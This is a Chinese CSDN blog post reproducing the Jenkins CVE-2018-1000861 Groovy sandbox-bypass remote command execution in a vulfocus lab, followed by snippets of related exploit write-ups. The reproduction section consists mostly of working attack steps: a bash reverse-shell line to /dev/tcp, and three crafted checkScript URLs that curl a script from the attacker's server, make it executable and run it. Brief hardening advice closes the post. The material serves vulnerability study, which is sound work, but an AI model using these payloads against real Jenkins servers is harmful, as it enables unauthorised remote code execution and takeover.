[漏洞复现]vulfocus/jenkins-cve_2018_1000861-命令执行

最新推荐文章于 2024-07-06 10:37:52 发布
最新推荐文章于 2024-07-06 10:37:52 发布
阅读量387 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: jenkins
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45751902/article/details/128015633
版权
本文详细介绍了Jenkins的一个安全漏洞,该漏洞允许攻击者通过构造特殊URL执行任意命令,影响版本为Jenkins 2.138。攻击者首先下载恶意脚本,然后赋予执行权限,最终执行命令。修复措施包括设置强口令、限制公网访问和升级到最新版本。
摘要由CSDN通过智能技术生成

文章目录

一、简介

Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令

Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。
通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令

二、影响版本

Jenkins 2.138

三、漏洞复现

先在自己的服务器上创建一个文件,内容为

bash -i >& /dev/tcp/ip/port 0>&1

然后打开下面的url

http://123.58.224.8:17513/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl+-o+/tmp/1.sh+http://自己服务器ip/1.txt".execute()}}

给下载的文件执行权限

http://123.58.224.8:17513/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"chmod+777+/tmp/1.sh".execute()}}

在自己的服务器上监听端口,然后执行下面的命令

http://123.58.224.8:17513/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"bash+/tmp/1.sh".execute()}}

在这里插入图片描述

四、修复

1.设置强口令

2.尽量不要开放到公网

3.限制来源IP

4.升级到最新版

空白行
关注
专栏目录
Jenkins远程命令执行漏洞
m0_48520508的博客
12-23 536
0x00简介 Jenkins自动化部署可以解决集成、测试、部署等重复性的工作,工具集成的效率明显高于人工操作;并且持续集成可以更早的获取代码变更的信息,从而更早的进入测试阶段,更早的发现问题,这样解决问题的成本就会显著下降:持续集成缩短了从开发、集成、测试、部署各个环节的时间,从而也就缩短了中间出现的等待时间;持续集成也意味着开发、集成、测试、部署得以持续。 0x01漏洞概述 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者
vulfocus漏洞复现-初级】solr 代码执行 (CVE-2019-12409)
ll_515的博客
01-20 2311
Apache Solr受影响的版本8.1.1和8.2.0在solr.in.sh配置文件中默认开启了ENABLE_REMOTE_JMX_OPTS配置项,即允许远程加载JMX,导致可远程代码执行
Jenkins远程命令执行漏洞 CVE-2018-1000861 漏洞复现
ADummy的博客
03-04 629
Jenkins远程命令执行漏洞CVE-2018-1000861) by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令Jenkins在沙盒中执行Groovy前会先检查脚本是
漏洞复现----6、Jenkins远程命令执行漏洞CVE-2018-1000861
七天
11-25 4542
文章目录一、Jenkins简介二、CVE-2018-1000861简介三、漏洞复现 一、Jenkins简介 Jenkins是一个独立的开源自动化服务器,由JAVA开发。 可用于自动化各种任务,如构建,测试和部署软件;也可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告等。 Jenkins可以通过本机系统包Docker安装,也可以通过安装Java Runtime Environment的任何机器独立运行。 在很多中大型金融企业中普遍使用Jenkins来作为项目发
jenkins2.289.1版本远程命令执行漏洞
山兔的博客
11-13 3023
在网络安全行业中,有一种方法可以识别、定义和编目公开披露的漏洞。这种类型的标识称为CVE,代表常见漏洞和披露。分析后,为每个漏洞分配一个严重等级,称为 CVSS 分数,范围从 0 到 10,其中 0 表示信息,10 表示严重。这些分数取决于几个因素,其中一些是 CIA 的危害级别(机密性、完整性、可用性)、攻击复杂程度、攻击面的大小等。在计算机安全中,任意代码执行 (ACE) 是攻击者在目标计算机或目标进程中执行任意命令或代码的能力。[…]旨在利用此类漏洞的程序称为任意代码执行漏洞
Jenkins远程命令执行漏洞CVE-2018-1000861
EC_Carrot的博客
07-05 424
漏洞复现 只需要访问以下网址即可执行命令: http://your-ip:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript ?sandbox=true &value=public class x { public x(){ "touch /tmp/success".execute(
Jenkins RCE 漏洞CVE-2019-1003000) 复现
玄道的网安博客
09-24 3579
影响版本 Pipeline: Declarative Plugin up to and including 1.3.4 Pipeline: Groovy Plugin up to and including 2.61 Script Security Plugin up to and including 1.49 环境搭建 复现漏洞CVE-2019-1003000 (Script Security) 测试环境需要安装docker git clone https://github.com.
CVE-2019-1003000 Jenkins RCE 复现
prettyX的博客
06-18 1997
过程 前提,在Kali下安装好docker 准备漏洞环境 git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc.git cd cve-2019-1003000-jenkins-rce-poc pip install -r requirements.txt cd sample-vuln ./run.sh 在进行完上述命令之后,通过如下命令 docker ps 并未发现docker运行实例 通过查.
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437) 复现
yukinorong的博客
06-29 3308
基础知识 序列化和反序列化 反序列化漏洞原因 在Java反序列化中,会调用被反序列化的readObject方法,当readObject方法书写不当时就会引发漏洞。 反序列化的检测 基础库中隐藏的反序列化漏洞 优秀的Java开发人员一般会按照安全编程规范进行编程,很大程度上减少了反序列化漏洞的产生。并且一些成熟的Java框架比如Spring MVC、Struts2等,都有相应的防范反序列化的机制。如果仅仅是开发失误,可能很少会产生反序列化漏洞,即使产生,其绕过方法、利用方式也较为复杂。但
[漏洞复现] jenkins 远程代码执行CVE-2019-100300)
qq_45751902的博客
11-24 2425
拥有Overall/Read 权限的用户可以绕过沙盒保护,在jenkins可以执行任意代码。此漏洞需要一个账号密码和一个存在的job。Jenkins的pipeline主要是通过一个配置文件或者job里面的pipeline脚本配置来设定每个job的步骤. pipeline定义了几乎所有要用到的流程, 比如执行shell, 存档, 生成测试报告, 发布报告等。
Jenkins-CI 远程代码执行漏洞复现CVE-2017-1000353)
m0_63082628的博客
07-05 1546
Jenkins-CI 远程代码执行漏洞复现
jenkins漏洞复现
Shanfenglan's blog
11-30 1607
文章目录什么是jenkinsJenkins远程命令执行漏洞CVE-2018-1000861)参考文章 什么是jenkins 实现了CI/CD的产品。jenkins会从git或者svn上拉代码然后在配置所指向的环境中进行编译并上线。 Jenkins的思想就是自动化部署,“自动化”的具体体现在:当我们向版本库(SVN)提交新的代码后,应用服务器(Tomcat)就会自动从我们的SVN上拉去新的war包,然后重新部署,用户或测试人员看到的就是最新的应用程序。 Jenkins远程命令执行漏洞CVE-2018-10
漏洞复现-Jenkins
aming小老弟
10-03 588
渗透
Jenkins-CI 远程代码执行漏洞CVE-2017-1000353)
m0_65354386的博客
07-05 814
Jenkins 可以自动执行代码构建、编译、打包以及单元测试、集成测试等,确保代码质量,还拥有丰富的插件库,能够集成各种工具和服务,且支持自动化部署应用到测试或生产环境。Jenkins 提供详细的构建日志和报告,通过自动化构建和测试,能够为开发团队提供了高效的持续集成和持续部署解决方案,同时促进敏捷开发和 DevOps 实践的落地。将刚才生成的字节码文件发送给目标:python exploit.py http://your-ip:8080 jenkins_poc.ser。查看靶场端口:docker ps。
Jenkins漏洞CVE-2017-1000353)复现
qq_62056583的博客
07-05 792
Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限。网上查找相关资料显示,漏洞经过序列化的Java SignedObject对象传输到基于远程处理的Jenkins CLI,在使用新的对象ObjectInputStream对其进行反序列化操作即可绕过现有的基于黑名单的保护机制。查看tmp目录下是否成功生成,但我的虚拟机中并没有生成相应的数据包,或者说是我的Java环境出的问题(该项实验目前还没成功实现)对生成的字节码文件进行发送,使用预备知识第二条指令。
Jenkins远程代码执行漏洞
chaojixiaojingang
09-07 1574
1.资产查找 Fofa:title=”jenkins” 2.漏洞描述: Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台。Jenkins存在远程代码执行漏洞漏洞成因是Jenkins平台提供了一个界面给使用者检查自己的Pipeline脚本,使用GroovyClassLoader.parseClass()来检查Pipeline脚本语法的正确性,攻击者构造特定的代码造成远程代码执行,攻击者通过该漏洞可获取服务器完全...
Jenkins RCE 漏洞复现CVE-2017-1000353)】
最新发布
qq_61947585的博客
07-06 387
Jenkins存在未经身份验证的远程代码执行漏洞,经过序列化的Java SignedObject对象传输到基于远程处理的Jenkins CLI,在使用新的对象ObjectInputStream对其进行反序列化操作即可绕过现有的基于黑名单的保护机制。6. 使用 CVE-2017-1000353-SNAPSHOT-all.jar 生成执行反弹 shell 命令的字节码文件 jenkins_poc.ser。这里应该可以监听到,成功反弹shell,但好像机子出现了点问题监听不成功,,
Jenkins RCE 漏洞复现CVE-2017-1000353、CVE-2018-1000861
oiadkt的博客
09-21 2150
Jenkins 是软件测试过程中常用的一种持续构建的工具,Jenkins RCE 漏洞触发方式大致分为两种,一种使用 Jenkins CLI 触发,而另一种触发方式为 HTTP 请求触发。这里复现CVE-2017-1000353 与 CVE-2018-1000861 就是两种触发方式的代表。
yang.li_test2_01 create successful Traceback (most recent call last): File "/IP/sip_dv/yang.li/test0612/proc_tools/Jenkins_script/jenkins_create_flow_v2.py", line 34, in <module> create_jenkins_jobs(server, configFileName) File "/IP/sip_dv/yang.li/test0612/proc_tools/Jenkins_script/jenkins_operation/curd_operation.py", line 58, in create_jenkins_jobs server.build_job(jobConfig.jobName) File "/tools/python/3.10.2/lib/python3.10/site-packages/jenkins/__init__.py", line 1370, in build_job response = self.jenkins_request(requests.Request( File "/tools/python/3.10.2/lib/python3.10/site-packages/jenkins/__init__.py", line 578, in jenkins_request return self._response_handler( File "/tools/python/3.10.2/lib/python3.10/site-packages/jenkins/__init__.py", line 539, in _response_handler response.raise_for_status() File "/tools/python/3.10.2/lib/python3.10/site-packages/requests/models.py", line 1021, in raise_for_status raise HTTPError(http_error_msg, response=self) requests.exceptions.HTTPError: 409 Client Error: Conflict for url: http://ci.enflame.cn/job/yang.li_test2_01/build
06-13
根据你的提示信息,我看到你在使用 Python 的 Jenkins 库进行 Jenkins Job 的创建,并且在执行 `server.build_job(jobConfig.jobName)` 时出现了 HTTP 409 Conflict 错误。这个错误通常表示你正在尝试创建一个已经...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值